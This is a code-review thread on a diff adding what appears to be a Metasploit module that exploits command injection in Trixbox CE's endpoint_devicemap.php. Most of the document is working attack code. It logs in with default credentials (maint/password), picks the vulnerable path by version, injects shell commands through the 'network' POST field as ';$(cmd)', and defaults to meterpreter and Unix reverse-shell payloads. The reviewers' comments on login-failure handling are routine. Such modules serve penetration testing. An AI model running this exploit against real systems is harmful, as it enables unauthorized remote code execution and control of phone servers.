modules/exploits/unix/webapp/trixbox_ce_endpoint_devicemap_rce.rb

```diff
@@ -0,0 +1,161 @@
+        'Targets' =>
+          [
+            [
+              'Automatic (Linux Dropper)',
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            ],
+            [
+              'Automatic (Unix In-Memory)',
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+              'Type' => :unix_memory
+            ]
+          ],
+        'Privileged' => false,
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'User to login with', 'maint']),
+        OptString.new('HttpPassword', [ true, 'Password to login with', 'password']),
+      ]
+    )
+  end
+
+  def user
+    datastore['HttpUsername']
+  end
+
+  def pass
+    datastore['HttpPassword']
+  end
+
+  def get_target(res)
+    version = res.body.scan(/v(\d\.\d)/).flatten.first
+    print_good("#{peer} - Trixbox CE v#{version}.x identified.")
+    if Gem::Version.new(version).between?(Gem::Version.new('2.6'), Gem::Version.new('2.8'))
+      @uri = normalize_uri(target_uri.path, '/maint/modules/endpointcfg/endpoint_devicemap.php')
+    elsif Gem::Version.new(version).between?(Gem::Version.new('2.0'), Gem::Version.new('2.4'))
+      @uri = normalize_uri(target_uri.path, '/maint/modules/11_endpointcfg/endpoint_devicemap.php')
+    elsif Gem::Version.new(version) == Gem::Version.new('1.2')
+      @uri = normalize_uri(target_uri.path, '/maint/endpoint_devicemap.php')
+    else
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
+    end
+  end
+
+  def login(user, pass, _opts = {})
+    uri = normalize_uri(target_uri.path, '/maint/')
+    print_status("#{peer} - Authenticating using \"#{user}:#{pass}\" credentials...")
+    res = send_request_cgi({
+      'uri' => uri,
+      'method' => 'GET',
+      'authorization' => basic_auth(user, pass),
+      'vars_get' => {
+        'lang' => 'english'
+      }
+    })
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed.')
+    end
+    if res.code == 200
+      print_good("#{peer} - Authenticated successfully.")
+      return res
+    else
+      fail_with(Failure::NoAccess, 'Authentication failed.')
+    end
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'authorization' => basic_auth(user, pass),
+      'vars_get' => {
+        'lang' => 'english'
+      },
+      'vars_post' => {
+        'network' => ";$(#{cmd})"
+      }
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
+  end
+
+  def check
+    res = login(user, pass)
+    get_target(res)
```

Comment:
Wait wait wait, why are we getting the target without checking what value `res` has? At this point the login could have failed and we are just blindly trusting that we logged in successfully. Also you may need to do some form of a `case` check here to handle cases where the authentication fails v.s the file not being found, etc, etc.

Reply:
What about that?
```   
  def check
    res = login(user, pass)
    unless res
      return CheckCode::Unknown
    end
    get_target(res)
    ...
```

and

```
  def exploit
    res = login(user, pass)
    unless res
      return CheckCode::Unknown
    end
    get_target(res)
    ...
```

Reply:
Okay I thought the code calling the `login()` method might need more checks but your already raising errors for specific scenarios within the `login()` method so these additions look good 👍